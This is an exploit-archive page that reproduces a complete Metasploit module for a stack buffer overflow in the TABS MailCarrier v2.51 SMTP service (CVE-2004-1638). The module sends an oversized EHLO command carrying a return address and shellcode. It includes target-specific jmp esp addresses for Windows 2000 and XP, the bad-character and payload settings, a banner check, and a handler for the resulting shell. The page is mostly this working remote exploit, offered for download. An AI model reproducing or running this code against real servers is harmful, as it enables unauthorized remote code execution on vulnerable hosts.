TABS MailCarrier v2.51 SMTP EHLO Overflow

TABS MailCarrier v2.51 SMTP EHLO Overflow: Posted Nov 26, 2009; Authored by Patrick Webster | Site metasploit.com; This Metasploit module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.; tags | exploit; advisories | CVE-2004-1638; SHA-256 | 9def8c6bc7afd6b37a54cfbd536ef1dbea1bda259a7ed818e65302d2b275cfe8; Download | Favorite | View

TABS MailCarrier v2.51 SMTP EHLO Overflow

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {}) 
    super(update_info(info,    
      'Name'    => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
      'Description'  => %q{
                This module exploits the MailCarrier v2.51 suite SMTP service.
      The stack is overwritten when sending an overly long EHLO command.
      },
      'Author'   => [ 'Patrick Webster <patrick[at]aushack.com>' ],
      'Arch'    => [ ARCH_X86 ], 
      'License'       => MSF_LICENSE,
      'Version'       => '$Revision$',
      'References'    =>
      [
        [ 'CVE', '2004-1638' ],
        [ 'OSVDB', '11174' ],
        [ 'BID', '11535' ],
        [ 'URL', 'http://milw0rm.com/exploits/598' ],
      ],         
      'Privileged'    => true,
      'DefaultOptions'  =>
      {
        'EXITFUNC'   => 'thread',
      },
      'Payload' =>
        { 
          'Space'      => 300,
          'BadChars'     => "\x00\x0a\x0d:",
          'StackAdjustment'  => -3500,
        },
      'Platform' => ['win'],
      'Targets' =>
      [
        # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
        [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63  } ], # jmp esp expsrv.dll w2ksp0 - xpsp1
        [ 'Windows XP SP2 - EN',       { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
      ],
      'DisclosureDate' => 'Oct 26 2004',
      'DefaultTarget' => 0))
            
      register_options(
      [
        Opt::RPORT(25),
        Opt::LHOST(), # Required for stack offset
      ], self.class)
  end

  def check 
    connect
    banner = sock.get_once(-1,3)
    disconnect

    if (banner =~ /ESMTP TABS Mail Server for Windows NT/)
      return Exploit::CheckCode::Appears 
    end
      return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    
    sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
    sploit << [target['Ret']].pack('V') + payload.encoded
    
    sock.put(sploit + "\r\n")
    
    handler
    disconnect
  end

end

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

TABS MailCarrier v2.51 SMTP EHLO Overflow

TABS MailCarrier v2.51 SMTP EHLO Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

TABS MailCarrier v2.51 SMTP EHLO Overflow

Share This

TABS MailCarrier v2.51 SMTP EHLO Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems